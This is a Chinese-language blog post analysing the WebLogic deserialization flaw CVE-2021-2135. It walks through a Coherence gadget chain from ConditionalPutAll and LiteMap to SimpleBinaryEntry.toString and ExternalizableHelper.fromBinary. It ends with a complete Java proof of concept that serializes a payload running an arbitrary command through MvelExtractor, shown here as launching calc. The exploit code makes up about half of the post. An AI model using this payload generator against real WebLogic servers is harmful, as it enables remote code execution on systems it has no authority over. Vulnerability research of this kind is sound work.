F1v3's Notes
0%

Weblogic反序列化漏洞分析(CVE-2021-2135)

Posted on In
Symbols count in article: 3.2k Reading time ≈ 3 mins.

Weblogic反序列化漏洞分析(CVE-2021-2135)

先看 com.tangosol.util.ExternalizableHelper 方法,其中有 toBinaryfromBinary 可以把任意类转化和重建,这里可以作为 sink:
image

接下来就就是寻找利用链,寻找使用了这个 fromBinary 方法的地方,这里找到了 com.tangosol.internal.util.SimpleBinaryEntry:
image

这里的 getKeygetValue 方法都用到了 fromBinary,此外,还有个 toString 方法也调用了 getKeygetValue,间接的使用了 fromBinary
image

这里的 toString 方法非常熟悉了,本来可以直接使用 BadAttributeValueExpException.readObject() 利用链,但是观察到 m_keym_value 变量是用 transient 修饰的,所以无法通过 readObject 的方式来赋值。

所以需要半自动化的寻找,最后作者找到了 ConditionalPutAll 的利用链,
image

接着看 ConditionalPutAllreadExternal 方法调用了 ExternalizableHelper.readMap
image

跟进发现调用了 map.put:
image

这里的 map 可以是上面的 LiteMap,在 this.m_nImpl 是 2 时,会调用 Base.equals:
image

继续跟进 Base.equals:
image

由于这里的传入参数都是可控的,所以这里可以控制到 XString.equals
image

最终执行到 toString 方法,整个链就走通了。

POC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
public static void main(String[] args) throws Exception{

    MvelExtractor extractor = new MvelExtractor("Runtime.getRuntime().exec(\"calc\");");

    TopNAggregator.PartialResult partialResult = new TopNAggregator.PartialResult((Comparator)extractor, 1);
    NavigableMap<Object, Object> map = new TreeMap<>();
    Field field = SortedBag.class.getDeclaredField("m_map");
    field.setAccessible(true);
    map.put("1", "1");
    field.set(partialResult, map);

    Binary binarykey = ExternalizableHelper.toBinary(partialResult);
    Binary binaryvalue = new Binary();
    SimpleBinaryEntry simpleBinaryEntry = new SimpleBinaryEntry(binarykey, binaryvalue);


    XString xString = new XString("1");
    LiteMap liteMap = new LiteMap();

    setFieldValue(liteMap,"m_nImpl",intToByteArray(3)[3]);

    Field m_oContents = LiteMap.class.getDeclaredField("m_oContents");
    m_oContents.setAccessible(true);

    Map.Entry[] aEntry = new Map.Entry[8];

    Map.Entry<SimpleBinaryEntry, String> x1 = new AbstractMap.SimpleEntry<>(simpleBinaryEntry, "aaa");
    Map.Entry<XString, String> x2 = new AbstractMap.SimpleEntry<>(xString, "bbb");
    aEntry[0] = x1;
    aEntry[1] = x2;


    m_oContents.set(liteMap, aEntry);
    ConditionalPutAll conditionalPutAll = new ConditionalPutAll();
    setFieldValue(conditionalPutAll, "m_map", liteMap);
    AttributeHolder attributeHolder2 = new AttributeHolder();
    field = attributeHolder2.getClass().getDeclaredField("m_oValue");
    field.setAccessible(true);
    field.set(attributeHolder2, conditionalPutAll);
    File f = new File("tmp1.ser");
    ObjectOutputStream obj = new ObjectOutputStream(new FileOutputStream(f));
    obj.writeObject(attributeHolder2);
    obj.close();
}

public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
    Field field = getField(obj.getClass(), fieldName);
    field.set(obj, value);
}

public static Field getField(Class<?> clazz, String fieldName) {
    Field field = null;
    try {
        field = clazz.getDeclaredField(fieldName);
        field.setAccessible(true);
    } catch (NoSuchFieldException var4) {
        if (clazz.getSuperclass() != null)
            field = getField(clazz.getSuperclass(), fieldName);
    }
    return field;
}

public static byte[] intToByteArray(int i) {
    byte[] result = new byte[4];
    result[0] = (byte)((i >> 24) & 0xFF);
    result[1] = (byte)((i >> 16) & 0xFF);
    result[2] = (byte)((i >> 8) & 0xFF);
    result[3] = (byte)(i & 0xFF);
    return result;
}

image